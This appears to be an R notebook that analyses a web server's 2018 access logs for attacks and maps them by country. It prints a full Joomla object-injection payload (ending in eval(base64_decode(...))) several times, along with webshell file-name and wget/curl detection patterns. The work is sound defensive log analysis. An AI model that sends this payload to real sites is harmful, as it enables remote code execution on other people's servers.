## 24675  [IPREDACTED], -, -, [24/Sep/2018:11:26:07, +0000], GET /myships.php HTTP/1.1, 404, 209, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25611 [IPREDACTED], -, -, [25/Sep/2018:10:32:10, +0000], GET //myships.php HTTP/1.1, 302, 214, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25612  [IPREDACTED], -, -, [25/Sep/2018:10:32:10, +0000], GET /myships.php HTTP/1.1, 404, 209, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
##            IP.Address                Date                    Request
## 24017 [IPREDACTED] 2018-09-23 18:32:25 GET //myships.php HTTP/1.1
## 24018 [IPREDACTED] 2018-09-23 18:32:26  GET /myships.php HTTP/1.1
## 24674 [IPREDACTED] 2018-09-24 11:26:07 GET //myships.php HTTP/1.1
## 24675 [IPREDACTED] 2018-09-24 11:26:07  GET /myships.php HTTP/1.1
## 25611 [IPREDACTED] 2018-09-25 10:32:10 GET //myships.php HTTP/1.1
## 25612 [IPREDACTED] 2018-09-25 10:32:10  GET /myships.php HTTP/1.1
##       Response.Code Response.Length HTTP.Referer
## 24017           302             214            -
## 24018           404             209            -
## 24674           302             214            -
## 24675           404             209            -
## 25611           302             214            -
## 25612           404             209            -
##                                                            User.Agent
## 24017 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24018 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24674 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24675 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25611 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25612 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
##       Country.Code
## 24017           CN
## 24018           CN
## 24674           CN
## 24675           CN
## 25611           CN
## 25612           CN

They do attempt to hit the file they are attempting to create.

Java Exploit

httpd_data[grep("(JSimplepieFactory|JDatabaseDriverMysql)", httpd_data$User.Agent),]
##                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   Raw
## 6711  [IPREDACTED] - - [04/Sep/2018:02:30:30 +0000] "GET / HTTP/1.1" 302 203 "-" "}__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86"
## 42245  [IPREDACTED] - - [13/Oct/2018:21:52:01 +0000] "GET / HTTP/1.1" 302 203 "-" "}__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86"
##                 File.Name
## 6711  access_log-20180909
## 42245 access_log-20181014
##                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Raw.Split
## 6711  [IPREDACTED], -, -, [04/Sep/2018:02:30:30, +0000], GET / HTTP/1.1, 302, 203, -, }__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86
## 42245  [IPREDACTED], -, -, [13/Oct/2018:21:52:01, +0000], GET / HTTP/1.1, 302, 203, -, }__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86
##            IP.Address                Date        Request Response.Code
## 6711  [IPREDACTED] 2018-09-04 02:30:30 GET / HTTP/1.1           302
## 42245  [IPREDACTED] 2018-10-13 21:52:01 GET / HTTP/1.1           302
##       Response.Length HTTP.Referer
## 6711              203            -
## 42245             203            -
##                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            User.Agent
## 6711  }__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86
## 42245 }__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86
##       Country.Code
## 6711          <NA>
## 42245           UA

Looking at this exploit it seems very similar, but maybe less complicated. Serialization exploits packaged with null character termination issues combined with SQL Injection. Attacks have definitely seemingly gotten more complicated, but not completely esoteric yet, as people are trying to both [TODO]

https://blog.cloudflare.com/the-joomla-unserialize-vulnerability/

HTTP Header Patterns, Malware Retrieval

Building off the previous attacks, it becomes apparent that there are a few indicators of attack information such as the “User-Agent” HTTP header, URLs present in the request, attempts to trigger some form of a drop to shell (usually through PHP calls), or attempts to execute “wget” or “curl” to retrieve malware and execute it with GNU bash.

Unfortunately, all of the “wget” and “curl” based attacks were 404s when attempting to retrieve the payloads, which means that the attacker opens up the links for small periods of time. This would prove to be an interesting research endeavor to create a script that would retrieve the malware at the time it is requested to the Apache server (being absolutely careful not to execute anything as it's trying to exploit misuses of semi-colon and other delimiters), and create a pool of malware to check out the contents of.

httpd_data$User.Agent[nchar(as.character(httpd_data$User.Agent)) > 200]
##  [1] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"                                                                                                                                                                                                                                                                                                                 
##  [2] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"                                                                                                                                                                                                                                                                                                                 
##  [3] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"                                                                                                                                                                                                                                                                                                                 
##  [4] "}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:4:\\\"\\\\0\\\\0\\\\0a\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:5:\\\"cache\\\";b:1;s:19:\\\"cache_name_function\\\";s:6:\\\"assert\\\";s:10:\\\"javascript\\\";i:9999;s:8:\\\"feed_url\\\";s:54:\\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\\";}i:1;s:4:\\\"init\\\";}}s:13:\\\"\\\\0\\\\0\\\\0connection\\\";i:1;}\\xf0\\x9d\\x8c\\x86"
##  [5] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"                                                                                                                                                                                                                                                                                                                 
##  [6] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"                                                                                                                                                                                                                                                                                                                 
##  [7] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"                                                                                                                                                                                                                                                                                                                 
##  [8] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"                                                                                                                                                                                                                                                                                                                 
##  [9] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; SE 2.X MetaSr 1.0)"                                                                                                                                                                                                                                                                                                                                            
## [10] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; SE 2.X MetaSr 1.0)"                                                                                                                                                                                                                                                                                                                                            
## [11] "}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:4:\\\"\\\\0\\\\0\\\\0a\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:5:\\\"cache\\\";b:1;s:19:\\\"cache_name_function\\\";s:6:\\\"assert\\\";s:10:\\\"javascript\\\";i:9999;s:8:\\\"feed_url\\\";s:54:\\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\\";}i:1;s:4:\\\"init\\\";}}s:13:\\\"\\\\0\\\\0\\\\0connection\\\";i:1;}\\xf0\\x9d\\x8c\\x86"
## [12] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; BRI/1; IPH [IPREDACTED]19; BRI/2)"                                                                                                                                                                                                                                                                                                                                            
## [13] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; BRI/1; IPH [IPREDACTED]19; BRI/2)"                                                                                                                                                                                                                                                                                                                                            
## [14] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; BRI/1; IPH [IPREDACTED]19; BRI/2)"
http_attack_records <- httpd_data[grep("http", httpd_data$Request),]
wget_attack_records <- httpd_data[grep("(wget|curl)", httpd_data$Request),]
php_attack_records <- httpd_data[
    grep("/(shell|sheep|wshell|xshell|zuoshou|zshmindex|ceshi|she|sha)\\.php",
        httpd_data$Request
    ),
]
ua_attack_records <- httpd_data[
    grep("(LMAO|Hakai)/2.0", httpd_data$User.Agent),
]

attack_records <- rbind(
    php_attack_records, wget_attack_records,
    http_attack_records, ua_attack_records
)

new_attack_records <- httpd_data[
    httpd_data$IP.Address %in% unique(attack_records$IP.Address),
]

new_req_attack_records <- new_attack_records[
    grep("(LMAO|Hakai)/2.0", new_attack_records$Request),
]

new_ua_attack_records <- new_attack_records[
    grep("(LMAO|Hakai)/2.0", new_attack_records$User.Agent),
]

Mapping Attacks

Overall Map

g <- world_mapper(country_code_cleanup(new_attack_records$Country.Code))
g <- g + labs(
    title=paste0(site_name,
        ": HTTPD Attack GeoIP Lookup (Overall)", collapse=""
    ), fill="Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g

plot of chunk attack_graph

URL Present Map

g <- world_mapper(country_code_cleanup(http_attack_records$Country.Code))
g <- g + labs(
    title=paste0(site_name,
        ": HTTPD Attack GeoIP Lookup (URL present)", collapse=""
    ), fill="Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g

plot of chunk attack_graph_02

wget/curl Attempts Map

g <- world_mapper(country_code_cleanup(wget_attack_records$Country.Code))
g <- g + labs(
    title=paste0(site_name,
        ": HTTPD Attack GeoIP Lookup (wget/curl attempts)", collapse=""
    ), fill="Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g

plot of chunk attack_graph_03

Identified PHP Functions Map

g <- world_mapper(country_code_cleanup(php_attack_records$Country.Code))
g <- g + labs(
    title=paste0(site_name,
        ": HTTPD Attack GeoIP Lookup (PHP Functions)", collapse=""
    ), fill="Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g

plot of chunk attack_graph_04

Suspicious User-Agent Map

g <- world_mapper(country_code_cleanup(ua_attack_records$Country.Code))
g <- g + labs(
    title=paste0(site_name,
        ": HTTPD Attack GeoIP Lookup (Suspicious User-Agent)", collapse=""
    ), fill="Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g

plot of chunk attack_graph_05

Animations

turn_to_animation <- function(df){
    df$Animate.Time <- strftime(
        df$Date, format="%Y-%m-%d"
    )

    df$Count <- rep(0, nrow(df))
    agg_df <- aggregate(
        Count ~ as.factor(Animate.Time) + Country.Code,
        data=df, FUN=length
    )
    names(agg_df) <- c("Animate.Time", "Country.Code", "Count")

    agg_df$Animate.Time <- as.POSIXlt(agg_df$Animate.Time)

    all_df <- data.frame(
        Animate.Time=as.factor(seq(
            min(agg_df$Animate.Time),
            max(agg_df$Animate.Time),
            24*60*60
        ))
    )

    agg_df$Animate.Time <- as.factor(agg_df$Animate.Time)

    all_time_df <- merge(
        all_df, agg_df, all.x=TRUE, by="Animate.Time"
    )

    all_time_df <- merge(all_time_df, country_code_db, all.x=TRUE)
    all_time_df$Country <- all_time_df$Country.Name
    all_time_df
}

Animate Attacks

g <- world_mapper(turn_to_animation(new_attack_records))
g <- g + labs(
    title=paste0(site_name,
        ": HTTPD Attack GeoIP Lookup", collapse=""
    ), fill="Hits", x="", y=""
)
g <- g + geom_label(
    aes(x=Inf, y=Inf, label=Animate.Time),
    vjust="inward", hjust="inward",
    colour="#808080", fill="#FFFFFF", label.size=0
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g <- g + transition_manual(Animate.Time)
g

plot of chunk animate_attacks

Animate Hits

g <- world_mapper(turn_to_animation(httpd_data))
g <- g + labs(
    title=paste0(site_name, ": HTTPD: Hits by Country", collapse=""),
    fill="Hits", x="", y=""
)
g <- g + geom_label(
    aes(x=Inf, y=Inf, label=Animate.Time),
    vjust="inward", hjust="inward",
    colour="#808080", fill="#FFFFFF", label.size=0
)
g <- g + scale_fill_continuous(low="#003000", high="#00E000", guide="colorbar")
g <- g + transition_manual(Animate.Time)
g